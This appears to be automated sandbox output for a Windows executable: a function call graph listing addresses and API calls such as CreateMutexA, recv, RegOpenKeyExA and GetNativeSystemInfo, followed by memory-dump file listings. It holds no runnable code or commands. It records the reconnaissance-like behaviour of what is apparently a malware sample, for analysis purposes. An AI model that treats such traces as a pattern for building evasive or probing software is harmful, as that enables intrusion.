                                                                                                                                                                                                                                                                execution_graph 12735 86d0c7 12736 86d0d7 12735->12736 12737 86d17f 12736->12737 12738 86d17b RtlWakeAllConditionVariable 12736->12738 13334 859f44 13335 859f4c shared_ptr 13334->13335 13336 85a953 Sleep CreateMutexA 13335->13336 13338 85a01f shared_ptr 13335->13338 13337 85a98e 13336->13337 12795 853c47 12796 853c51 12795->12796 12799 853c5f 12796->12799 12802 8532d0 12796->12802 12797 853c68 12799->12797 12800 853810 4 API calls 12799->12800 12801 853cdb 12800->12801 12803 86c6ac GetSystemTimePreciseAsFileTime 12802->12803 12806 853314 12803->12806 12804 86c26a 5 API calls 12805 85333c __Mtx_unlock 12804->12805 12807 86c26a 5 API calls 12805->12807 12808 853350 __floor_pentium4 12805->12808 12806->12804 12806->12805 12809 853377 12807->12809 12808->12799 12810 86c6ac GetSystemTimePreciseAsFileTime 12809->12810 12811 8533af 12810->12811 12812 86c26a 5 API calls 12811->12812 12813 8533b6 12811->12813 12812->12813 12814 86c26a 5 API calls 12813->12814 12815 8533d7 __Mtx_unlock 12813->12815 12814->12815 12816 86c26a 5 API calls 12815->12816 12817 8533eb 12815->12817 12818 85340e 12816->12818 12817->12799 12818->12799 12582 858780 12583 858786 12582->12583 12589 886729 12583->12589 12586 8587a6 12588 8587a0 12596 886672 12589->12596 12591 858793 12591->12586 12592 8867b7 12591->12592 12593 8867c3 __cftof 12592->12593 12595 8867cd ___std_exception_copy 12593->12595 12608 886740 12593->12608 12595->12588 12597 88667e __cftof 12596->12597 12599 886685 ___std_exception_copy 12597->12599 12600 88a8c3 12597->12600 12599->12591 12601 88a8cf __cftof 12600->12601 12604 88a967 12601->12604 12603 88a8ea 12603->12599 12606 88a98a 12604->12606 12605 88d82f __cftof RtlAllocateHeap 12607 88a9d0 ___free_lconv_mon 12605->12607 12606->12605 12606->12606 12606->12607 12607->12603 12609 886762 12608->12609 12611 88674d ___std_exception_copy ___free_lconv_mon 12608->12611 12609->12611 12612 88a038 12609->12612 12611->12595 12613 88a050 12612->12613 12615 88a075 12612->12615 12613->12615 12616 890439 12613->12616 12615->12611 12617 890445 __cftof 12616->12617 12619 89044d __dosmaperr ___std_exception_copy 12617->12619 12620 89052b 12617->12620 12619->12615 12621 89054d 12620->12621 12624 890551 __dosmaperr ___std_exception_copy 12620->12624 12621->12624 12626 8900d2 12621->12626 12624->12619 12628 8900e3 12626->12628 12627 890106 12627->12624 12630 88fcc0 12627->12630 12628->12627 12629 88a671 __cftof 4 API calls 12628->12629 12629->12627 12631 88fd0d 12630->12631 12632 88690a __cftof 4 API calls 12631->12632 12636 88fd1c __cftof 12632->12636 12633 88b67d 4 API calls 12633->12636 12634 88c719 GetPEB ExitProcess GetPEB RtlAllocateHeap __fassign 12634->12636 12635 88ffbc __floor_pentium4 12635->12624 12636->12633 12636->12634 12636->12635 12636->12636 12739 8520c0 12740 86c68b __Mtx_init_in_situ 2 API calls 12739->12740 12741 8520cc 12740->12741 12742 85e0c0 recv 12743 85e122 recv 12742->12743 12744 85e157 recv 12743->12744 12745 85e191 12744->12745 12746 85e2b3 __floor_pentium4 12745->12746 12751 86c6ac 12745->12751 12758 86c452 12751->12758 12753 85e2ee 12754 86c26a 12753->12754 12755 86c292 12754->12755 12756 86c274 12754->12756 12755->12755 12756->12755 12775 86c297 12756->12775 12759 86c4a8 12758->12759 12761 86c47a __floor_pentium4 12758->12761 12759->12761 12764 86cf6b 12759->12764 12761->12753 12762 86c4fd __Xtime_diff_to_millis2 12762->12761 12763 86cf6b _xtime_get GetSystemTimePreciseAsFileTime 12762->12763 12763->12762 12765 86cf7a 12764->12765 12767 86cf87 __aulldvrm 12764->12767 12765->12767 12768 86cf44 12765->12768 12767->12762 12771 86cbea 12768->12771 12772 86cc07 12771->12772 12773 86cbfb GetSystemTimePreciseAsFileTime 12771->12773 12772->12767 12773->12772 12778 852ae0 12775->12778 12777 86c2ae Concurrency::cancel_current_task 12779 86bedf InitOnceExecuteOnce 12778->12779 12780 852af4 __cftof 12779->12780 12781 852aff 12780->12781 12782 88a671 __cftof 4 API calls 12780->12782 12781->12777 12785 886ccc 12782->12785 12783 888bec __cftof 4 API calls 12784 886cf6 12783->12784 12785->12783 12824 858980 12826 858aea 12824->12826 12827 8589d8 shared_ptr 12824->12827 12825 855c10 6 API calls 12825->12827 12827->12825 12827->12826 12983 852e00 12984 852e28 12983->12984 12985 86c68b __Mtx_init_in_situ 2 API calls 12984->12985 12986 852e33 12985->12986 12641 853c8e 12642 853c98 12641->12642 12644 853ca5 12642->12644 12649 852410 12642->12649 12646 853ccf 12644->12646 12653 853810 12644->12653 12647 853810 4 API calls 12646->12647 12648 853cdb 12647->12648 12650 852424 12649->12650 12657 86b52d 12650->12657 12654 85381c 12653->12654 12706 852440 12654->12706 12665 883aed 12657->12665 12659 86b5a5 ___std_exception_copy 12672 86b1ad 12659->12672 12660 86b598 12668 86af56 12660->12668 12664 85242a 12664->12644 12676 884f29 12665->12676 12667 86b555 12667->12659 12667->12660 12667->12664 12669 86af9f ___std_exception_copy 12668->12669 12671 86afb2 shared_ptr 12669->12671 12682 86b39f 12669->12682 12671->12664 12673 86b1d8 12672->12673 12675 86b1e1 shared_ptr 12672->12675 12674 86b39f 5 API calls 12673->12674 12674->12675 12675->12664 12677 884f2e __cftof 12676->12677 12677->12667 12678 88d634 __cftof 4 API calls 12677->12678 12681 888bfc ___std_exception_copy 12677->12681 12678->12681 12679 8865ed __cftof 3 API calls 12680 888c2f 12679->12680 12681->12679 12693 86bedf 12682->12693 12685 86b3e8 12685->12671 12702 86cc31 12693->12702 12696 886cbb 12697 886cc7 __cftof 12696->12697 12698 88a671 __cftof 4 API calls 12697->12698 12701 886ccc 12698->12701 12699 888bec __cftof 4 API calls 12700 886cf6 12699->12700 12701->12699 12703 86cc3f InitOnceExecuteOnce 12702->12703 12705 86b3e1 12702->12705 12703->12705 12705->12685 12705->12696 12709 86b5d6 12706->12709 12708 852472 12710 86b5f1 Concurrency::cancel_current_task 12709->12710 12711 888bec __cftof 4 API calls 12710->12711 12713 86b658 __cftof __floor_pentium4 12710->12713 12712 86b69f 12711->12712 12713->12708 12987 886a44 12988 886a5c 12987->12988 12989 886a52 12987->12989 12992 88698d 12988->12992 12991 886a76 ___free_lconv_mon 12993 88690a __cftof 4 API calls 12992->12993 12994 88699f 12993->12994 12994->12991 12383 85a856 12384 85a870 12383->12384 12385 85a892 shared_ptr 12383->12385 12384->12385 12386 85a94e 12384->12386 12390 85a8a0 12385->12390 12399 857d30 12385->12399 12389 85a953 Sleep CreateMutexA 12386->12389 12388 85a8ae 12388->12390 12391 857d30 7 API calls 12388->12391 12393 85a98e 12389->12393 12392 85a8b8 12391->12392 12392->12390 12394 857d30 7 API calls 12392->12394 12395 85a8c2 12394->12395 12395->12390 12396 857d30 7 API calls 12395->12396 12397 85a8cc 12396->12397 12397->12390 12398 857d30 7 API calls 12397->12398 12398->12390 12400 857d96 __cftof 12399->12400 12437 857ee8 shared_ptr __floor_pentium4 12400->12437 12438 855c10 12400->12438 12402 857dd2 12403 855c10 6 API calls 12402->12403 12406 857dff shared_ptr 12403->12406 12404 857ed7 12407 857f3f 12404->12407 12408 858019 12404->12408 12404->12437 12405 857ed3 GetNativeSystemInfo 12405->12404 12406->12404 12406->12405 12406->12437 12410 855c10 6 API calls 12407->12410 12409 855c10 6 API calls 12408->12409 12411 85804c 12409->12411 12412 857f67 12410->12412 12414 855c10 6 API calls 12411->12414 12413 855c10 6 API calls 12412->12413 12415 857f86 12413->12415 12416 85806b 12414->12416 12448 888bbe 12415->12448 12418 855c10 6 API calls 12416->12418 12419 8580a3 12418->12419 12420 855c10 6 API calls 12419->12420 12421 8580f4 12420->12421 12422 855c10 6 API calls 12421->12422 12423 858113 12422->12423 12424 855c10 6 API calls 12423->12424 12425 85814b 12424->12425 12426 855c10 6 API calls 12425->12426 12427 85819c 12426->12427 12428 855c10 6 API calls 12427->12428 12429 8581bb 12428->12429 12430 855c10 6 API calls 12429->12430 12431 8581f3 12430->12431 12432 855c10 6 API calls 12431->12432 12433 858244 12432->12433 12434 855c10 6 API calls 12433->12434 12435 858263 12434->12435 12436 855c10 6 API calls 12435->12436 12436->12437 12437->12388 12439 855c54 12438->12439 12451 854b30 12439->12451 12441 855d17 shared_ptr __floor_pentium4 12441->12402 12442 855c7b __cftof 12442->12441 12443 855da7 RegOpenKeyExA 12442->12443 12444 855e00 RegCloseKey 12443->12444 12446 855e26 12444->12446 12445 855ea6 shared_ptr __floor_pentium4 12445->12402 12446->12445 12447 855c10 4 API calls 12446->12447 12572 888868 12448->12572 12450 888bdc 12450->12437 12452 854ce5 12451->12452 12453 854b92 12451->12453 12452->12442 12453->12452 12455 886da6 12453->12455 12456 886dc2 __fassign 12455->12456 12457 886db4 12455->12457 12456->12453 12460 886d19 12457->12460 12465 88690a 12460->12465 12464 886d3d 12464->12453 12466 88692a 12465->12466 12472 886921 12465->12472 12466->12472 12479 88a671 12466->12479 12473 886d52 12472->12473 12474 886d8f 12473->12474 12475 886d5f 12473->12475 12564 88b67d 12474->12564 12476 886d6e __fassign 12475->12476 12559 88b6a1 12475->12559 12476->12464 12480 88a67b __cftof 12479->12480 12485 88a694 __cftof ___free_lconv_mon 12480->12485 12494 88d82f 12480->12494 12482 88694a 12486 88b5fb 12482->12486 12485->12482 12498 888bec 12485->12498 12487 88b60e 12486->12487 12488 886960 12486->12488 12487->12488 12524 88f5ab 12487->12524 12490 88b628 12488->12490 12491 88b63b 12490->12491 12492 88b650 12490->12492 12491->12492 12531 88e6b1 12491->12531 12492->12472 12497 88d83c __cftof 12494->12497 12495 88d867 RtlAllocateHeap 12496 88d87a 12495->12496 12495->12497 12496->12485 12497->12495 12497->12496 12499 888bf1 __cftof 12498->12499 12503 888bfc ___std_exception_copy 12499->12503 12504 88d634 12499->12504 12518 8865ed 12503->12518 12506 88d640 __cftof 12504->12506 12505 88d69c ___std_exception_copy 12505->12503 12506->12505 12507 88d81b __cftof 12506->12507 12508 88d726 12506->12508 12509 88d751 __cftof 12506->12509 12510 8865ed __cftof 3 API calls 12507->12510 12508->12509 12521 88d62b 12508->12521 12509->12505 12513 88a671 __cftof 4 API calls 12509->12513 12515 88d7a5 12509->12515 12511 88d82e 12510->12511 12513->12515 12515->12505 12517 88a671 __cftof 4 API calls 12515->12517 12516 88d62b __cftof 4 API calls 12516->12509 12517->12505 12519 8864c7 __cftof 3 API calls 12518->12519 12520 8865fe 12519->12520 12522 88a671 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12521->12522 12523 88d630 12522->12523 12523->12516 12525 88f5b7 __cftof 12524->12525 12526 88a671 __cftof 4 API calls 12525->12526 12528 88f5c0 __cftof 12526->12528 12527 88f606 12527->12488 12528->12527 12529 888bec __cftof 4 API calls 12528->12529 12530 88f62b 12529->12530 12532 88a671 __cftof 4 API calls 12531->12532 12533 88e6bb 12532->12533 12536 88e5c9 12533->12536 12535 88e6c1 12535->12492 12537 88e5d5 __cftof ___free_lconv_mon 12536->12537 12538 88e5f6 12537->12538 12539 888bec __cftof 4 API calls 12537->12539 12538->12535 12540 88e668 12539->12540 12541 88e6a4 12540->12541 12545 88a72e 12540->12545 12541->12535 12546 88a739 __cftof 12545->12546 12547 88d82f __cftof RtlAllocateHeap 12546->12547 12551 88a745 __cftof ___free_lconv_mon 12546->12551 12547->12551 12548 888bec __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12549 88a7c7 12548->12549 12550 88a7be 12552 88e4b0 12550->12552 12551->12548 12551->12550 12553 88e5c9 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12552->12553 12554 88e4c3 12553->12554 12555 88e259 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12554->12555 12556 88e4cb __cftof 12555->12556 12557 88e6c4 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12556->12557 12558 88e4dc __cftof ___free_lconv_mon 12556->12558 12557->12558 12558->12541 12560 88690a __cftof 4 API calls 12559->12560 12561 88b6be 12560->12561 12563 88b6ce __floor_pentium4 12561->12563 12569 88f1bf 12561->12569 12563->12476 12565 88a671 __cftof 4 API calls 12564->12565 12566 88b688 12565->12566 12567 88b5fb __cftof 4 API calls 12566->12567 12568 88b698 12567->12568 12568->12476 12570 88690a __cftof 4 API calls 12569->12570 12571 88f1df __cftof __fassign __freea __floor_pentium4 12570->12571 12571->12563 12573 88887a 12572->12573 12574 88690a __cftof 4 API calls 12573->12574 12577 88888f ___std_exception_copy 12573->12577 12576 8888bf 12574->12576 12575 886d52 4 API calls 12575->12576 12576->12575 12576->12577 12577->12450 12998 852b90 12999 852bce 12998->12999 13000 86b7fb TpReleaseWork 12999->13000 13001 852bdb shared_ptr __floor_pentium4 13000->13001 13198 852b10 13199 852b1c 13198->13199 13200 852b1a 13198->13200 13201 86c26a 5 API calls 13199->13201 13202 852b22 13201->13202 13082 8687d0 13083 86882a __cftof 13082->13083 13089 869bb0 13083->13089 13087 8688d9 std::_Throw_future_error 13088 86886c __floor_pentium4 13102 869ef0 13089->13102 13091 869be5 13106 852ce0 13091->13106 13093 869c16 13115 869f70 13093->13115 13095 868854 13095->13088 13096 8543f0 13095->13096 13097 86bedf InitOnceExecuteOnce 13096->13097 13098 85440a 13097->13098 13099 854411 13098->13099 13100 886cbb 4 API calls 13098->13100 13099->13087 13101 854424 13100->13101 13103 869f0c 13102->13103 13104 86c68b __Mtx_init_in_situ 2 API calls 13103->13104 13105 869f17 13104->13105 13105->13091 13107 852d1d 13106->13107 13108 86bedf InitOnceExecuteOnce 13107->13108 13109 852d46 13108->13109 13110 852d51 __floor_pentium4 13109->13110 13111 852d88 13109->13111 13120 86bef7 13109->13120 13110->13093 13113 852440 4 API calls 13111->13113 13114 852d9b 13113->13114 13114->13093 13117 869fef shared_ptr 13115->13117 13119 86a058 13117->13119 13133 86a210 13117->13133 13118 86a03b 13118->13095 13121 86bf03 Concurrency::cancel_current_task 13120->13121 13122 86bf73 13121->13122 13123 86bf6a 13121->13123 13125 852ae0 5 API calls 13122->13125 13127 86be7f 13123->13127 13126 86bf6f 13125->13126 13126->13111 13128 86cc31 InitOnceExecuteOnce 13127->13128 13129 86be97 13128->13129 13130 86be9e 13129->13130 13131 886cbb 4 API calls 13129->13131 13130->13126 13132 86bea7 13131->13132 13132->13126 13134 86a290 13133->13134 13140 8671d0 13134->13140 13136 86a2cc shared_ptr 13137 853ee0 3 API calls 13136->13137 13138 86a4be shared_ptr 13136->13138 13139 86a4a6 13137->13139 13138->13118 13139->13118 13141 867211 13140->13141 13148 853970 13141->13148 13143 867446 __floor_pentium4 13143->13136 13144 8672ad __cftof 13144->13143 13145 86c68b __Mtx_init_in_situ 2 API calls 13144->13145 13146 867401 13145->13146 13153 852ec0 13146->13153 13149 86c68b __Mtx_init_in_situ 2 API calls 13148->13149 13150 8539a7 13149->13150 13151 86c68b __Mtx_init_in_situ 2 API calls 13150->13151 13152 8539e6 13151->13152 13152->13144 13154 852f06 13153->13154 13157 852f6f 13153->13157 13155 86c6ac GetSystemTimePreciseAsFileTime 13154->13155 13156 852f12 13155->13156 13158 85301e 13156->13158 13161 852f1d __Mtx_unlock 13156->13161 13163 86c6ac GetSystemTimePreciseAsFileTime 13157->13163 13172 852fef 13157->13172 13159 86c26a 5 API calls 13158->13159 13160 853024 13159->13160 13162 86c26a 5 API calls 13160->13162 13161->13157 13161->13160 13164 852fb9 13162->13164 13163->13164 13165 86c26a 5 API calls 13164->13165 13166 852fc0 __Mtx_unlock 13164->13166 13165->13166 13167 86c26a 5 API calls 13166->13167 13169 852fd8 13166->13169 13167->13169 13168 86c26a 5 API calls 13170 85303c 13168->13170 13169->13168 13169->13172 13171 86c6ac GetSystemTimePreciseAsFileTime 13170->13171 13181 853080 shared_ptr __Mtx_unlock 13171->13181 13172->13143 13173 86c26a 5 API calls 13174 8531cb 13173->13174 13175 86c26a 5 API calls 13174->13175 13176 8531d1 13175->13176 13177 86c26a 5 API calls 13176->13177 13183 853193 __Mtx_unlock 13177->13183 13178 8531a7 __floor_pentium4 13178->13143 13179 86c26a 5 API calls 13180 8531dd 13179->13180 13181->13174 13181->13178 13182 86c6ac GetSystemTimePreciseAsFileTime 13181->13182 13184 85315f 13181->13184 13182->13184 13183->13178 13183->13179 13184->13173 13184->13176 13184->13183 12858 86d111 12860 86d122 12858->12860 12859 86d12a 12860->12859 12862 86d199 12860->12862 12863 86d1a7 SleepConditionVariableCS 12862->12863 12865 86d1c0 12862->12865 12863->12865 12865->12860 12969 859adc 12970 859aea 12969->12970 12974 859afe shared_ptr 12969->12974 12971 85a917 12970->12971 12970->12974 12972 85a953 Sleep CreateMutexA 12971->12972 12973 85a98e 12972->12973 12975 855c10 6 API calls 12974->12975 12976 859b7c 12975->12976 12977 858b30 6 API calls 12976->12977 12978 859b8d 12977->12978 12979 855c10 6 API calls 12978->12979 12980 859cb1 12979->12980 12981 858b30 6 API calls 12980->12981 12982 859cc2 12981->12982 13002 853f9f 13003 853fad 13002->13003 13005 853fb6 13002->13005 13004 852410 5 API calls 13003->13004 13004->13005 12918 85215a 12921 86c6fc 12918->12921 12920 852164 12922 86c724 12921->12922 12923 86c70c 12921->12923 12922->12920 12923->12922 12925 86cfbe 12923->12925 12926 86ccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 12925->12926 12927 86cfd0 12926->12927 12927->12923 13006 859ba5 13007 859ba7 13006->13007 13008 855c10 6 API calls 13007->13008 13009 859cb1 13008->13009 13010 858b30 6 API calls 13009->13010 13011 859cc2 13010->13011 12367 886629 12370 8864c7 12367->12370 12371 8864d5 __cftof 12370->12371 12372 886520 12371->12372 12375 88652b 12371->12375 12374 88652a 12381 88a302 GetPEB 12375->12381 12377 886535 12378 88654a __cftof 12377->12378 12379 88653a GetPEB 12377->12379 12380 886562 ExitProcess 12378->12380 12379->12378 12382 88a31c __cftof 12381->12382 12382->12377 12578 85b1a0 12579 85b1f2 12578->12579 12580 85b3ad CoInitialize 12579->12580 12581 85b3fa shared_ptr __floor_pentium4 12580->12581 12714 8520a0 12717 86c68b 12714->12717 12716 8520ac 12720 86c3d5 12717->12720 12719 86c69b 12719->12716 12721 86c3e1 12720->12721 12722 86c3eb 12720->12722 12723 86c39e 12721->12723 12724 86c3be 12721->12724 12722->12719 12723->12722 12729 86ccd5 12723->12729 12733 86cd0a 12724->12733 12726 86c3d0 12726->12719 12730 86cce3 InitializeCriticalSectionEx 12729->12730 12731 86c3b7 12729->12731 12730->12731 12731->12719 12734 86cd1f RtlInitializeConditionVariable 12733->12734 12734->12726 12866 854120 12867 85416a 12866->12867 12869 8541b2 __floor_pentium4 12867->12869 12870 853ee0 12867->12870 12871 853f48 12870->12871 12875 853f1e 12870->12875 12872 853f58 12871->12872 12876 852c00 12871->12876 12872->12869 12875->12869 12877 852c0e 12876->12877 12883 86b847 12877->12883 12879 852c42 12880 852c49 12879->12880 12889 852c80 12879->12889 12880->12869 12882 852c58 Concurrency::cancel_current_task 12884 86b854 12883->12884 12888 86b873 Concurrency::details::_Reschedule_chore 12883->12888 12892 86cb77 12884->12892 12886 86b864 12886->12888 12894 86b81e 12886->12894 12888->12879 12900 86b7fb 12889->12900 12891 852cb2 shared_ptr 12891->12882 12893 86cb92 CreateThreadpoolWork 12892->12893 12893->12886 12896 86b827 Concurrency::details::_Reschedule_chore 12894->12896 12898 86cdcc 12896->12898 12897 86b841 12897->12888 12899 86cde1 TpPostWork 12898->12899 12899->12897 12901 86b807 12900->12901 12902 86b817 12900->12902 12901->12902 12904 86ca78 12901->12904 12902->12891 12905 86ca8d TpReleaseWork 12904->12905 12905->12902 13185 853fe0 13186 854022 13185->13186 13187 8540d2 13186->13187 13188 85408c 13186->13188 13191 854035 __floor_pentium4 13186->13191 13189 853ee0 3 API calls 13187->13189 13192 8535e0 13188->13192 13189->13191 13193 853616 13192->13193 13194 852ce0 5 API calls 13193->13194 13197 85364e Concurrency::cancel_current_task shared_ptr __floor_pentium4 13193->13197 13195 85369e 13194->13195 13196 852c00 3 API calls 13195->13196 13195->13197 13196->13197 13197->13191 13203 85af20 13204 85af63 13203->13204 13215 886660 13204->13215 13209 88663f 4 API calls 13210 85af80 13209->13210 13211 88663f 4 API calls 13210->13211 13212 85af98 __cftof 13211->13212 13221 8555f0 13212->13221 13214 85b04e shared_ptr __floor_pentium4 13216 88a671 __cftof 4 API calls 13215->13216 13217 85af69 13216->13217 13218 88663f 13217->13218 13219 88a671 __cftof 4 API calls 13218->13219 13220 85af71 13219->13220 13220->13209 13222 855610 13221->13222 13224 855710 __floor_pentium4 13222->13224 13225 8522c0 13222->13225 13224->13214 13228 852280 13225->13228 13229 852296 13228->13229 13232 8887f8 13229->13232 13235 887609 13232->13235 13234 8522a4 13234->13222 13236 887649 13235->13236 13237 887631 ___std_exception_copy __floor_pentium4 13235->13237 13236->13237 13238 88690a __cftof 4 API calls 13236->13238 13237->13234 13239 887661 13238->13239 13241 887bc4 13239->13241 13243 887bd5 13241->13243 13242 887be4 ___std_exception_copy 13242->13237 13243->13242 13248 888168 13243->13248 13253 887dc2 13243->13253 13258 887de8 13243->13258 13268 887f36 13243->13268 13249 888178 13248->13249 13250 888171 13248->13250 13249->13243 13277 887b50 13250->13277 13252 888177 13252->13243 13254 887dcb 13253->13254 13256 887dd2 13253->13256 13255 887b50 4 API calls 13254->13255 13257 887dd1 13255->13257 13256->13243 13257->13243 13259 887e09 ___std_exception_copy 13258->13259 13260 887def 13258->13260 13259->13243 13260->13259 13261 887f69 13260->13261 13263 887fa2 13260->13263 13266 887f77 13260->13266 13261->13266 13267 887f8b 13261->13267 13285 888241 13261->13285 13263->13267 13281 888390 13263->13281 13266->13267 13289 8886ea 13266->13289 13267->13243 13269 887f69 13268->13269 13271 887f4f 13268->13271 13272 888241 4 API calls 13269->13272 13275 887f77 13269->13275 13276 887f8b 13269->13276 13270 887fa2 13273 888390 4 API calls 13270->13273 13270->13276 13271->13269 13271->13270 13271->13275 13272->13275 13273->13275 13274 8886ea 4 API calls 13274->13276 13275->13274 13275->13276 13276->13243 13278 887b62 13277->13278 13279 888ab6 4 API calls 13278->13279 13280 887b85 13279->13280 13280->13252 13283 8883ab 13281->13283 13282 8883dd 13282->13266 13283->13282 13293 88c88e 13283->13293 13286 88825a 13285->13286 13300 88d3c8 13286->13300 13288 88830d 13288->13266 13290 88875d __floor_pentium4 13289->13290 13292 888707 13289->13292 13290->13267 13291 88c88e __cftof 4 API calls 13291->13292 13292->13290 13292->13291 13296 88c733 13293->13296 13295 88c8a6 13295->13282 13297 88c743 13296->13297 13298 88690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 13297->13298 13299 88c748 __cftof ___std_exception_copy 13297->13299 13298->13299 13299->13295 13301 88d3d8 ___std_exception_copy 13300->13301 13302 88d3ee 13300->13302 13301->13288 13302->13301 13303 88d485 13302->13303 13304 88d48a 13302->13304 13306 88d4ae 13303->13306 13307 88d4e4 13303->13307 13313 88cbdf 13304->13313 13309 88d4cc 13306->13309 13310 88d4b3 13306->13310 13330 88cef8 13307->13330 13326 88d0e2 13309->13326 13319 88d23e 13310->13319 13314 88cbf1 13313->13314 13315 88690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 13314->13315 13316 88cc05 13315->13316 13317 88cef8 GetPEB ExitProcess GetPEB RtlAllocateHeap 13316->13317 13318 88cc0d __alldvrm __cftof ___std_exception_copy _strrchr 13316->13318 13317->13318 13318->13301 13321 88d26c 13319->13321 13320 88d2de 13322 88cf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 13320->13322 13321->13320 13323 88d2a5 13321->13323 13324 88d2b7 13321->13324 13322->13323 13323->13301 13325 88d16d GetPEB ExitProcess GetPEB RtlAllocateHeap 13324->13325 13325->13323 13328 88d10f 13326->13328 13327 88d14e 13327->13301 13328->13327 13329 88d16d GetPEB ExitProcess GetPEB RtlAllocateHeap 13328->13329 13329->13327 13331 88cf10 13330->13331 13332 88cf75 13331->13332 13333 88cf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 13331->13333 13332->13301 13333->13332 12833 85a9f4 12844 859230 12833->12844 12835 85aa03 shared_ptr 12836 855c10 6 API calls 12835->12836 12842 85aab3 shared_ptr 12835->12842 12837 85aa65 12836->12837 12838 855c10 6 API calls 12837->12838 12839 85aa8d 12838->12839 12840 855c10 6 API calls 12839->12840 12840->12842 12843 85ad3c shared_ptr __floor_pentium4 12842->12843 12854 888ab6 12842->12854 12847 859284 shared_ptr 12844->12847 12845 855c10 6 API calls 12845->12847 12846 859543 shared_ptr __floor_pentium4 12846->12835 12847->12845 12852 85944f shared_ptr 12847->12852 12848 855c10 6 API calls 12848->12852 12849 8598b5 shared_ptr __floor_pentium4 12849->12835 12850 85979f shared_ptr 12850->12849 12851 855c10 6 API calls 12850->12851 12853 859927 shared_ptr __floor_pentium4 12851->12853 12852->12846 12852->12848 12852->12850 12853->12835 12855 888ad1 12854->12855 12856 888868 4 API calls 12855->12856 12857 888adb 12856->12857 12857->12842 12995 854276 12996 852410 5 API calls 12995->12996 12997 85427f 12996->12997 12909 858d30 12910 858d80 12909->12910 12911 855c10 6 API calls 12910->12911 12912 858d9a shared_ptr __floor_pentium4 12911->12912 12928 852170 12929 86c6fc InitializeCriticalSectionEx 12928->12929 12930 85217a 12929->12930 12936 8542b0 12939 853ac0 12936->12939 12938 8542bb shared_ptr 12940 853af9 12939->12940 12941 8532d0 6 API calls 12940->12941 12943 853c38 12940->12943 12944 853b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 12940->12944 12941->12943 12942 8532d0 6 API calls 12946 853c5f 12942->12946 12943->12942 12943->12946 12944->12938 12945 853c68 12945->12938 12946->12945 12947 853810 4 API calls 12946->12947 12948 853cdb 12947->12948 13012 8577b0 13013 8577f1 shared_ptr 13012->13013 13014 855c10 6 API calls 13013->13014 13016 857883 shared_ptr 13013->13016 13014->13016 13015 855c10 6 API calls 13018 8579e3 13015->13018 13016->13015 13017 857953 shared_ptr __floor_pentium4 13016->13017 13019 855c10 6 API calls 13018->13019 13020 857a15 shared_ptr 13019->13020 13021 857aa5 shared_ptr __floor_pentium4 13020->13021 13022 855c10 6 API calls 13020->13022 13023 857b7d 13022->13023 13024 855c10 6 API calls 13023->13024 13025 857ba0 13024->13025 13026 855c10 6 API calls 13025->13026 13026->13021 13027 8587b0 13028 8587b6 13027->13028 13029 8587b8 GetFileAttributesA 13027->13029 13028->13029 13030 8587c4 13029->13030 13031 8647b0 13033 864eed 13031->13033 13032 864f59 shared_ptr __floor_pentium4 13033->13032 13034 857d30 7 API calls 13033->13034 13035 8650ed 13034->13035 13070 858380 13035->13070 13037 865106 13038 855c10 6 API calls 13037->13038 13039 865155 13038->13039 13040 855c10 6 API calls 13039->13040 13041 865171 13040->13041 13076 859a00 13041->13076 13071 8583e5 __cftof 13070->13071 13072 855c10 6 API calls 13071->13072 13075 858403 shared_ptr __floor_pentium4 13071->13075 13073 858427 13072->13073 13074 855c10 6 API calls 13073->13074 13074->13075 13075->13037 13077 859a3f 13076->13077 13078 855c10 6 API calls 13077->13078 13079 859a47 13078->13079 13080 858b30 6 API calls 13079->13080 13081 859a58 13080->13081 12637 8587b2 12638 8587b6 12637->12638 12639 8587b8 GetFileAttributesA 12637->12639 12638->12639 12640 8587c4 12639->12640 12953 859ab8 12955 859acc 12953->12955 12956 859b08 12955->12956 12957 855c10 6 API calls 12956->12957 12958 859b7c 12957->12958 12965 858b30 12958->12965 12960 859b8d 12961 855c10 6 API calls 12960->12961 12962 859cb1 12961->12962 12963 858b30 6 API calls 12962->12963 12964 859cc2 12963->12964 12966 858b7c 12965->12966 12967 855c10 6 API calls 12966->12967 12968 858b97 shared_ptr __floor_pentium4 12967->12968 12968->12960
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32(?,?,0088652A,?,?,?,?,?,00887661), ref: 00886567
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758665126.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758709605.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758811555.00000000008B9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758829107.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758847335.00000000008C5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758863602.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758880113.00000000008C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758988832.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759006705.0000000000A23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A49000.00000040.00000001.01000000.00000003.sdmpDownload File
